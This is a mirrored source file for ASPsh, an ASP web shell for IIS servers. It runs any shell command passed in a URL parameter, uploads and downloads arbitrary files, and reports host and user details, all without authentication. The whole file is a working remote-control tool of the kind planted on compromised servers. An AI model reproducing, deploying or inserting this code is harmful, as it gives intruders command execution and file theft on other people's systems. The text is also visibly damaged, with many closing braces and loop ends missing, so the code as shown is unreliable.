mirror of
synced 2025-02-16 17:58:23 +00:00
765 lines
27 KiB
765 lines
27 KiB
<% @language="javascript" %>
<SCRIPT language="VBScript" runat="server">
' Stuff that should have been available in UNICODE through some IIS object
' but has to be done in VBScript, sigh...
Function Request_RawData()
Dim vArray, sResult, I
vArray = Request.BinaryRead(Request.TotalBytes)
sResult = ""
For I = 1 To LenB(vArray)
sResult = sResult & ChrW(AscB(MidB(vArray, I, 1)))
Request_RawData = sResult
End Function
Function Response_RawData(sString)
Dim vArray, I
vArray = ""
For I = 1 To Len(sString)
vArray = vArray & ChrB(Asc(Mid(sString, I, 1)))
End Function
<SCRIPT language="JavaScript" runat="server">
Stuff that should have been in the JavaScript language in the first place
// Turn the given string into HTML by replacing any control characters
// with their HTML encoded equivalent, such as replacing '\n' with "<BR>"
function HTMLencode(sText) {
return sText.replace(/[\<\>\"\&\r\n \t]/g, function (sChar, iIndex) {
switch (sChar) {
case '\r': return "";
case '\n': return "<BR>";
case ' ': return " ";
case '\t': return " ";
default: return "&#" + sChar.charCodeAt(0) + ";";
// Turn the given string into a JS string by replacing anything that breaks
// compilation, is not ASCII or terminates the string with an encoded char,
// such as replacing '\n' with "\x0D".
function JSencode(sText) {
return sText.replace(/[\x00-\x1F\"\'\\\u0100-\uFFFF]/g, function (c) {
var sic = c.charCodeAt(0).toString(16);
if (sic.length == 1) return "\\x0" + sic;
if (sic.length == 2) return "\\x" + sic;
if (sic.length == 3) return "\\u0" + sic;
return "\\u" + sic;
Stuff that should have been in the IIS Objects in the first place.
// Return the value of a GET variable or a default value if it's either not
// supplied or there is more than one such value.
function getVar(sName, sDefault) {
var oGetVar = Request.QueryString(sName);
return (oGetVar.Count == 1 ? unescape(oGetVar(1)) : sDefault);
// Return the value of a cookie variable or a default value if it's either
// not present or there is more than one such value.
function getCookie(sName, sDefault) {
var oCookieVar = Request.Cookies(escape(sName));
return oCookieVar != "" ? unescape(oCookieVar) : sDefault;
// Handle the POST data the way it should have been done by IIS.
var gaPOST = [];
if (
Request.ServerVariables("REQUEST_METHOD") == "POST" &&
Request.TotalBytes > 0
) {
// Convert the bytes to a unicode string we can manipulate in JavaScript
// Whomever designed this never really envisioned UNICODE if you ask me,
// but unfortunately it's what we have to work with, so we'll have to
// convert this to UNICODE using VBScript.
var sRequest = Request_RawData();
// We're assuming our data is encoded using multipart-formdata, but
// we'll check to make sure it makes sense:
var sCRLF = "\r\n";
var iEndSeperator = sRequest.indexOf(sCRLF);
if (iEndSeperator >= 0) { // A CRLF is required for our handler to work
// Find out what seperates each part of the data:
var sSeperator = sRequest.substr(0, iEndSeperator);
// And cut our data into portions using it:
var asRequest = sRequest.split(sSeperator);
// Because the data starts and ends with a seperator, the first and
// last element of our array do not contain any data. We can use
// this as a sanity check:
if (asRequest.length >= 3) {
asRequest.shift(); // Discard the first...
asRequest.pop(); // ... and last element.
for (var i in asRequest) {
// Each part starts with the "\r\n" that comes after a
// seperator, so we'll ignore that:
var sPart = asRequest[i].substr(
asRequest[i].indexOf(sCRLF) + sCRLF.length
// Get the information from inside the part
var aPart = processPostPart(sPart);
// If it processed correctly, we'll add it to the POST info:
if (aPart != null) gaPOST[aPart.name] = aPart;
function processPostPart(sPart) {
// Each part in a multi-part/formdata has one or more lines of header
// followed by a blank line, then there any number of bytes of raw data
// followed by a CRLF. First We'll split the header from the data by
// looking for this blank line:
var sEndHeader = "\r\n\r\n";
var iEndHeader = sPart.indexOf(sEndHeader);
if (iEndHeader < 0) return null; // No blank line: bad data
// Let's process the headers:
var asHeaders = sPart.substr(0, iEndHeader).split("\r\n");
// The first line must start with "Content-Disposition: form-data;"
// followed by the name of the variable and optionally a filename.
var rFirstLine = /^Content\-Disposition\: form\-data\; name=\"(.*?)\"(?:\; filename=\"(.*?)\")?$/;
var oMatch = asHeaders[0].match(rFirstLine);
if (oMatch == null) return null; // Bad data
// Then there might be a whole load of other headers, which we'll
// completely ignore for now... *TODO*
// Return the information about the headers and the raw data
return {
name: oMatch[1],
filename: (oMatch.length == 2 ? null : oMatch[2]),
data: sPart.substring(
iEndHeader + sEndHeader.length,
sPart.length - 2 // -2 == CRLF
// Return the value of a POST variable or a default value if it's either not
// supplied or something is wrong with the POST.
function postVar(sName) {
return (typeof(gaPOST[sName]) != "undefined" ? gaPOST[sName] : null);
Stuff that makes outputting XML data easier.
function outputXMLdata(asData) {
Response.ContentType = "text/plain";
for (var i in asData) {
Response.Write(escape(i) + "=" + escape(asData[i]) + "\n");
function outputXMLerror(e) {
return outputXMLdata({
error: (e.number == 0 ? "" : (((e.number < 0 ? 0x100000000 : 0) + e.number)).toString(16) + " ") +
ASPsh can finally start doing something useful here:
var gsAppName = "ASPsh";
var gsAppVersion = "v1.0";
var gsAuthor = "Berend-Jan "SkyLined" Wever";
var gsCopyright = "Copyright (C) 2003-2010";
var goWSS = new ActiveXObject("WScript.Shell");
var gsRequest = getVar("req", "main");
var gsCommand = getVar("cmd", "");
// var gsCwd = getVar("cwd", getCookie("cwd", new String(goWSS.CurrentDirectory)));
// var gsCwd = getCookie("cwd", new String(goWSS.CurrentDirectory));
var gsCwd = getCookie("cwd", "(unknown)");
var giTimeout = parseInt(getVar("timeout", "0"));
var goUploadSource = postVar("uploadsource");
var goUploadDestination = postVar("uploaddestination");
var goDownloadSource = getVar("downloadsource");
switch (gsRequest) {
case "inf": getInformation(); break;
case "cmd": executeCommand(); break;
case "upload": uploadFile(); break;
case "download": downloadFile(); break;
case "main": outputMainpage(); break;
default: Response.Write("Error"); break;
function getInformation() {
try {
var sIISVer = Request.ServerVariables("SERVER_SOFTWARE");
var sUsername = Request.ServerVariables("LOGON_USER");
var sCmd = "cmd.exe /Q /C " +
"ver" +
"&hostname" +
"&cd" + (sUsername == "" ? "&whoami" : "");
var sDebug = "cmd=" + sCmd + "\n";
var oCMD = goWSS.Exec(sCmd);
var asStdOut = [];
if (!oCMD.Stderr.AtEndOfStream) {
var sStdErr = new String(oCMD.Stderr.ReadAll());
throw new Error("Error while getting system information: " +
"exit code = " + oCMD.ExitCode + ", stderr output:\n" +
if (oCMD.ExitCode != 0) {
throw new Error("Error while getting system information: " +
"exit code = " + oCMD.ExitCode + ".");
if (!oCMD.Stdout.AtEndOfStream) {
asStdOut = new String(oCMD.Stdout.ReadAll()).replace(/\r/g, "").split("\n");
sDebug += "stdout=\"" + asStdOut.join("\", \"") + "\"\n";
var sFirstLine = asStdOut.shift();
if (sFirstLine != "") {
throw new Error("First line of cmd output is expect to be " +
"empty, found \"" + sFirstLine + "\".");
var sWinVer = asStdOut.shift();
if (!/^Microsoft Windows/.test(sWinVer)) {
throw new Error("Second line of cmd output is expect to be " +
"the windows version, found \"" + sWinVer + "\".");
var sHostname = asStdOut.shift();
if (!/[^\s]/.test(sHostname)) {
throw new Error("Third line of cmd output is expect to be " +
"the hostname, found \"" + sHostname + "\".");
var sCwd = asStdOut.shift();
if (!/[A-Za-z]\:\\/.test(sCwd)) {
throw new Error("Fifth line of cmd output is expect to be " +
"the current working directory, found \"" + sCwd + "\".");
if (sUsername == "") sUsername = asStdOut.shift();
if (!/[^\s]/.test(sUsername)) {
throw new Error("Sixth line of cmd output is expect to be " +
"whoami output, found \"" + sUsername + "\".");
if (asStdOut.length != 1) {
throw new Error("Additional lines found in cmd output: \n" +
return outputXMLdata({
"os version": sWinVer,
"server version": sIISVer,
"hostname": sHostname,
"username": sUsername,
"cwd": sCwd,
"debug": sDebug
} catch(e) {
return outputXMLerror(e);
function getRandomString(iLength) {
var sRandom = "";
var sRandomChars = "QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm1234567890";
while (sRandom.length < iLength) sRandom += sRandomChars.charAt(Math.floor(Math.random() * sRandomChars.length));
return sRandom;
function executeCommand() {
try {
var sRandom = getRandomString(0x20);
var goWSS = new ActiveXObject("WScript.Shell");
var gsCwdCommand = (gsCwd == "" || gsCwd == "(unknown)" ? "" :
"(" + gsCwd.substr(0, 2) + "&cd \"" + gsCwd.substr(2) + "\")&");
var sCmd = "CMD.EXE /Q /V:ON /C " +
gsCwdCommand +
(/^\s*$/.test(gsCommand) ? "" : "(" + gsCommand + ")&") +
"echo " + sRandom + " !ERRORLEVEL! !CD!&exit";
var sDebug = "cmd=" + sCmd + "\n";
var oCMD = goWSS.Exec(sCmd);
var iStartTime = new Date().valueOf();
var sStdOut = "", asStdOut = [], sStdErr = "", asStdErr = [];
var sErrorLevelAndCwd = "";
var bDone = false;
var iTimeout = 0;
do {
while (!oCMD.Stdout.AtEndOfStream) {
var sChar = oCMD.StdOut.Read(1);
switch (sChar) {
case "\r": break;
case "\n":
if (sStdOut.substr(0, sRandom.length) == sRandom) {
sErrorLevelAndCwd = sStdOut.substr(sRandom.length + 1);
bDone = true;
sStdOut = "";
sStdOut += sChar;
while (!oCMD.StdErr.AtEndOfStream) {
var sChar = oCMD.StdErr.Read(1);
switch (sChar) {
case "\r": break;
case "\n":
sStdErr = "";
sStdErr += sChar;
if (oCMD.Status != 0) {
bDone = true;
} else if (new Date().valueOf() < iStartTime + giTimeout * 1000) {
goWSS.Popup("Waiting for command to finish...", 1);
} else {
iTimeout = Math.round((new Date().valueOf() - iStartTime) / 1000);
bDone = true;
} while (!bDone);
var iNow = new Date().valueOf();
sDebug += "start=" + iStartTime + ", end=" + iNow + ", elapsed=" + (iNow-iStartTime) + ", timeout=" + giTimeout + "\n";
sDebug += "stdout=\"" + asStdOut.join("\", \"") + "\"\n";
sDebug += "stderr=\"" + asStdErr.join("\", \"") + "\"\n";
var sErrorLevel = "0";
var sCwd = gsCwd;
if (iTimeout == 0) {
if (!/^[0-9]+\s[A-Z]\:\\/i.test(sErrorLevelAndCwd)) {
throw new Error("Last line of cmd output is expect to be " +
"the errorlevel and current working directory, found " +
"\"" + sErrorLevelAndCwd + "\".");
sDebug += "lastline=\"" + sErrorLevelAndCwd + "\"\n";
var iSpaceIndex = sErrorLevelAndCwd.indexOf(" ");
sDebug += "spaceindex=" + iSpaceIndex + "\n";
var sErrorLevel = sErrorLevelAndCwd.substr(0, iSpaceIndex);
var sCwd = sErrorLevelAndCwd.substr(iSpaceIndex + 1);
return outputXMLdata({
"cwd": sCwd,
"errorlevel": sErrorLevel,
"stdout": asStdOut.join("\n"),
"stderr": asStdErr.join("\n"),
"timeout": iTimeout,
"debug": sDebug
} catch(e) {
return outputXMLerror(e);
function uploadFile() {
if (
goUploadSource == null ||
goUploadSource.filename == null ||
goUploadSource.data == null ||
goUploadDestination == null ||
goUploadDestination.data == null
) {
return outputTransferStatus(
"Upload: POST data is missing information.<BR>"
var sSourcePath = goUploadSource.filename;
var sFilename = sSourcePath.lastIndexOf("\\") < 0 ? sSourcePath :
sSourcePath.substr(sSourcePath.lastIndexOf("\\") + 1);
var sDestinationPath = goUploadDestination.data;
if (sDestinationPath == "") sDestinationPath = gsCwd;
var sFileData = goUploadSource.data;
// Check if the target path is a directory and if so, add the uploaded
// filename to the target path:
var oFSO = new ActiveXObject("Scripting.FileSystemObject");
if (
/\\$/.test(sDestinationPath) || // Ends with slash "\"
) {
if (sFilename == "") {
return outputTransferStatus(
"Upload: No filename specified.<BR>"
if (sDestinationPath.charAt(sDestinationPath.length - 1) != "\\") {
sDestinationPath += "\\";
sDestinationPath += sFilename;
// Now we need to safe the file to disk. ADODB.Stream is used because
// Scripting.FileSystemObject behaved bad for unknown reasons. I had
// some issues getting this correct, because writing binary files did
// not work for unknown reasons. So I write to text files, using a
// character set that doesn't translate any character. This effectively
// makes it equal to a binary write: problem solved.
try {
var oAS = new ActiveXObject("ADODB.Stream");
oAS.Mode = 3; // ReadWrite
oAS.Type = 2; // 2 = Text, 1= Binary
oAS.Charset = "ISO-8859-1"; // No translation of characters
oAS.Open(); // Open the stream
oAS.WriteText(goUploadSource.data); // Write the data
oAS.SaveToFile(sDestinationPath, 2); // Save to our destination
} catch (e) {
return outputTransferStatus(
"Upload: Error writing file" +
" \"" + sSourcePath + "\" to" +
" \"" + sDestinationPath + "\"" +
" : " + e.message + "<BR>"
"Successfully uploaded" +
" \"" + sSourcePath + "\" to" +
" \"" + sDestinationPath + "\"" +
" (" + goUploadSource.data.length + " bytes)<BR>"
function downloadFile() {
var sSourcePath = (
goDownloadSource == null ||
goDownloadSource == ""
? "" : goDownloadSource);
if (sSourcePath == "") {
return outputTransferStatus(
"Download: No filename specified"
var sFilename = sSourcePath;
// If a path is not supplied, use the CWD from the cookie. Otherwise,
// cut the path from the filename varaible.
if (sSourcePath.lastIndexOf("\\") < 0) {
sSourcePath = gsCwd +
(gsCwd.charAt(gsCwd.length - 1) == "\\" ? "" : "\\") +
} else {
sFilename = sSourcePath.substr(sSourcePath.lastIndexOf("\\") + 1);
var sBuffer = null;
try {
var oAS = new ActiveXObject("ADODB.Stream");
oAS.Mode = 3; // ReadWrite
oAS.Type = 2; // 2 = Text, 1= Binary
oAS.Charset = "ISO-8859-1"; // No translation of characters
oAS.Open(); // Open the stream
oAS.LoadFromFile(sSourcePath); // Load our file into the buffer
sBuffer = oAS.ReadText();
} catch (e) {
return outputTransferStatus(
"Download: Error reading file" +
" \"" + sSourcePath + "\" " +
" : " + e.message + "<BR>"
Response.addHeader("Content-Disposition", "attachment; filename=" + sFilename);
Response.addHeader("Content-Length", sBuffer.length);
Response.ContentType = "application/octet-stream"; // generic stuff
Response_RawData(sBuffer); // Output the buffer
<% function outputTransferStatus(bSuccess, sStatus) { %>
<SCRIPT type="text/JavaScript" language="JavaScript">
parent.document.getElementById("output").innerHTML +=
"<BR><%=bSuccess ? JSencode(sStatus) : JSencode("<SPAN class=\"stderr\">" + sStatus + "</SPAN>")%>";
<% } %>
<% function outputMainpage() { %>
<TITLE><%=gsAppName%> <%=gsAppVersion%> loading...</TITLE>
* {
text-overflow: ellipsis;
vertical-align: top;
margin:0px; padding: 0px; border:0px; border-spacing:0px;
width: 100%;
padding-right: 7px;
.button {
border: 2px outset ButtonFace; margin-left:2px;
font: 9pt Arial;
color:black; background:ButtonFace;
.buttonwidth {
width: 80px;
.input1 {
.inset {
border: 2px inset ButtonFace;
.cmd {
font: 9pt Courier New, Courier;
.highlight { color: white; background:transparent; }
.stdout { color: silver; background:transparent; }
.stderr { color: red; background:transparent; }
.debug {
xdisplay: none; /* uncomment if you want to see this */
color: gray;
<BODY onLoad="return body_onload();" onKeyDown="return body_onkeydown();">
<LEGEND id="title">Loading...</LEGEND>
<DIV class="inset cmd">
<SPAN id="output" class="cmd"></SPAN><BR>
<FORM onSubmit="return form_onsubmit()">
<TABLE cellspacing=0 cellpassing=0 style="width:100%;"><TR>
<TD><NOBR style="width:100%;" class="cmd stdout" id="prompt"></NOBR></TD>
<TD style="width:100%;"><INPUT style="width:100%; margin: 0px; padding: 0px; margin-top:-1px; border:0px;" class="cmd" type="text" id="input"></TD>
<LEGEND id="title">Up-/Download center</LEGEND>
<TABLE cellspacing=2 cellpassing=0 style="width:100%;"><TR>
<FORM enctype="multipart/form-data" method="post" action="?req=upload" target="transferFrame">
<TD><NOBR style="width:100%;">Upload from:</NOBR></TD>
<TD style="width:100%;" colspan="2"><INPUT type="file" style="width:100%;" name="uploadsource" id="uploadFrom"></TD>
<TD><NOBR style="width:100%;">Upload to:</NOBR></TD>
<TD style="width:100%;"><INPUT type="text" style="width:100%;" name="uploaddestination" id="uploadTo"></TD>
<TD class="buttonwidth"><INPUT type="submit" class="buttonwidth" value="Upload" id="uploadButton"></TD>
<FORM method="get" action="?" target="transferFrame">
<INPUT type="hidden" name="req" value="download">
<TD><NOBR style="width:100%;">Download from:</NOBR></TD>
<TD style="width:100%;"><INPUT type="text" style="width:100%;" name="downloadsource" id="downloadFrom"></TD>
<TD class="buttonwidth"><INPUT type="submit" class="buttonwidth" value="Download" id="downloadButton"></TD>
<IFRAME id="focus" style="display:none" name="transferFrame"></IFRAME><BR>
<SPAN id="debug" class="debug"></SPAN>
<SCRIPT type="text/JavaScript" language="JavaScript">
var gbLoaded = false;
var goTitle = document.getElementById("title");
var goOutput = document.getElementById("output");
var goPrompt = document.getElementById("prompt");
var goInput = document.getElementById("input");
var goFocus = document.getElementById("focus");
var goUploadFrom = document.getElementById("uploadFrom");
var goUploadTo = document.getElementById("uploadTo");
var goUploadButton = document.getElementById("uploadButton");
var goDownloadFrom = document.getElementById("downloadFrom");
var goDownloadButton = document.getElementById("downloadButton");
var goDebug = document.getElementById("debug");
var goFocus = document.getElementById("focus");
var gsUrl = location.protocol + "//" + location.host + location.pathname;
var gsCwd = "(unknown)";
var giTimeout = 30;
var gaHistory = [""], giHistory = 0;
function getXML(asData) {
var oXML = new XMLHttpRequest();
asQuery = [];
for (var i in asData) {
asQuery.push(escape(i) + "=" + escape(asData[i]));
oXML.open("GET", gsUrl + (asQuery.length > 0 ? "?" + asQuery.join("&") : ""), false);
var asResponse = new String(oXML.responseText).split("\n");
var aResult = [];
while (asResponse.length > 0) {
var sLine = asResponse.pop();
if (sLine.indexOf("=") >= 0) {
var asLine = sLine.split("=");
aResult[unescape(asLine[0])] = unescape(asLine[1]);
return aResult;
function body_onload() {
var asInformation = getXML({req:"inf"});
var sOSVersion = "(unknown)";
var sServerVersion = "(unknown)";
var sHostname = "(unknown)";
var sUsername = "(unknown)";
var sDebug = "";
var bError = false;
for (var i in asInformation) {
switch(i) {
case "os version": sOSVersion = asInformation[i]; break;
case "server version": sServerVersion = asInformation[i]; break;
case "hostname": sHostname = asInformation[i]; break;
case "username": sUsername = asInformation[i]; break;
case "cwd": gsCwd = asInformation[i]; break;
case "debug": sDebug += HTMLencode(asInformation[i]); break;
sDebug += "Unexpected: " + HTMLencode(i) + "=" + HTMLencode(asInformation[i]) + "<BR>";
bError = true;
// Ignore useless extra info
document.title = sUsername + " @ " + sHostname;
goTitle.innerHTML = HTMLencode("CMD.EXE " + sUsername + " @ " + sHostname);
goOutput.innerHTML = HTMLencode(
"<%=gsAppName%>\ <%=gsAppVersion%> on " +
sServerVersion + ", " + sOSVersion
) + "<BR>" +
"<%=gsCopyright%> <%=gsAuthor%>.<BR>" +
(bError ? "<SPAN class=\"stderr\">An internal error has occured.<BR></SPAN>" : "");
goPrompt.innerHTML = HTMLencode(gsCwd) + ">";
goUploadTo.value = gsCwd;
setCookie("cwd", gsCwd);
gbLoaded = true;
goDebug.innerHTML = sDebug +
"<BR>Cookie: " + HTMLencode(JSencode(document.cookie)) +
"<BR>Cwd: \"" + HTMLencode(JSencode(gsCwd)) + "\"";
return true;
function form_onsubmit() {
if (gbLoaded) {
var sOldCwd = gsCwd;
var asInformation = getXML({
var iErrorLevel = 0;
var sStdOut = "";
var sStdErr = "";
var sDebug = "";
var iTimeout = 0;
var bError = false;
for (var i in asInformation) {
switch(i) {
case "cwd": gsCwd = asInformation[i]; break;
case "errorlevel": iErrorLevel = asInformation[i]; break;
case "stdout": sStdOut = asInformation[i]; break;
case "stderr": sStdErr = asInformation[i]; break;
case "debug": sDebug += HTMLencode(asInformation[i]); break;
case "timeout": iTimeout = parseInt(asInformation[i]); break;
sDebug += "Unexpected: " + HTMLencode(i) + "=" + HTMLencode(asInformation[i]) + "<BR>";
bError = true;
// Ignore useless extra info
goOutput.innerHTML +=
"<SPAN class=\"stdout\"><BR>" + goPrompt.innerHTML + "</SPAN>" +
HTMLencode(goInput.value) + "<BR>" +
"<SPAN class=\"stdout\">" + HTMLencode(sStdOut) + "</SPAN>" +
"<SPAN class=\"stderr\">" + HTMLencode(sStdErr) + "</SPAN>" +
(iErrorLevel != 0 ? "<SPAN class=\"stderr\">(ERROR LEVEL = " + iErrorLevel + ")<BR></SPAN>" : "") +
(bError ? "<SPAN class=\"stderr\">An internal error has occured.<BR></SPAN>" : "") +
(iTimeout != 0 ? "<SPAN class=\"stderr\">The command timed out after " + iTimeout + " seconds.<BR></SPAN>" : "");
goPrompt.innerHTML = HTMLencode(gsCwd) + ">";
setCookie("cwd", gsCwd);
goInput.value = "";
if (sOldCwd != gsCwd && goUploadTo.value == sOldCwd) {
goUploadTo.value = gsCwd;
goDebug.innerHTML = sDebug +
"<BR>Cookie: " + HTMLencode(JSencode(document.cookie)) +
"<BR>Cwd: \"" + HTMLencode(JSencode(gsCwd)) + "\"";
return false;
function body_onkeydown() {
if (gbLoaded) {
switch(document.activeElement) {
case goUploadFrom:
case goUploadTo:
case goUploadButton:
case goDownloadFrom:
case goDownloadButton:
// Don't do anything.
case goInput:
switch(event.keyCode) {
case 38: goHistory(-1); break;
case 40: goHistory(+1); break;
event.cancelBubble = true;
return true;
function addHistory() {
if (
/[^\s]/.test(goInput.value) && // No empty strings
gaHistory[giHistory] != goInput.value // Only if changed
) {
if (giHistory != 0) {
// 0 a B c d (B = giHistory, E = inserted)
var aPreHistory = gaHistory.splice(1, giHistory);
// 0 c d (a B = aPreHistory)
for (var i in aPreHistory) {
// 0 c d a B
giHistory = 0;
function goHistory(iMove) {
if (gaHistory[giHistory] != goInput.value) {
if (iMove > 0) iMove++;
giHistory += iMove;
while (giHistory < 0) giHistory += gaHistory.length
giHistory %= gaHistory.length
goInput.value = gaHistory[giHistory];
function setCookie(sName, sValue) {
document.cookie = escape(sName) + "=" + escape(sValue);
function HTMLencode(sText) {
return sText.replace(/[\<\>\"\&\r\n \t]/g, function (sChar, iIndex) {
switch (sChar) {
case '\r': return "";
case '\n': return "<BR>";
case ' ': return " ";
case '\t': return " ";
default: return "&#" + sChar.charCodeAt(0) + ";";
function JSencode(sText) {
return sText.replace(/[\x00-\x1F\"\'\\\u0100-\uFFFF]/g, function (c) {
var sic = c.charCodeAt(0).toString(16);
if (sic.length == 1) return "\\x0" + sic;
if (sic.length == 2) return "\\x" + sic;
if (sic.length == 3) return "\\u0" + sic;
return "\\u" + sic;
<% } %> |